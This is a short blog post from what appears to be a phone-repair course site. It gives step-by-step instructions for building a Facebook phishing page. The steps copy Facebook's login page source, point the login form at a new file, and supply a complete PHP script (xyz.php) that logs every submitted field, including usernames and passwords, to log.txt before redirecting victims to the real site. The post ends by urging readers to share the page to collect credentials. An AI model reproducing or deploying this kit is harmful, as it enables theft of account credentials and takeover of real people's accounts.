mobile software repiar course Software repiar course Available All mobile software Box & Dongles Whatsapp Me +91 9923050420 ( PAN - INDIA Services )

Social Media Icons

test

Breaking

Post Top Ad

Your Ad Spot

Thursday 21 September 2023

Create Facebook Phishing Page:

 Create Facebook Phishing Page:


 
Phishing is the technique to create a similar type of web page to the existing web page. Phishing is a type of attack where the intruders disguising as trustworthy agents attempt to gain your personal information such as passwords, credit card numbers, or any other information.

 

 Steps to Create Facebook Phishing Page:

 

 

  • Open the Facebook login page in your browser.
  • Press ctrl+U to find the source code.
  • Copy whole source code and create a PHP file (index.php) and paste it.
  • Now, search for string methode=”POST”, it will give you two results first for login and second for register.
  • Next, replace the action file name as “xyz.php” in the login form.
  • Now create a file “xyz.php” and “log.txt” and paste below code in “xyz.php”.

 File name: xyz.php

 

 

<?php
 
// Set the location to redirect the page
header ('Location: http://www.facebook.com');
 
// Open the text file in writing mode 
$file = fopen("log.txt", "a");
 
foreach($_POST as $variable => $value) {
    fwrite($file, $variable);
    fwrite($file, "=");
    fwrite($file, $value);
    fwrite($file, "\r\n");
}
 
fwrite($file, "\r\n");
fclose($file);
exit;
?>

Now you are done, share the page and if anyone will enter username and password then it will save into the log.txt file.

 

No comments:

Post Top Ad

Your Ad Spot

Pages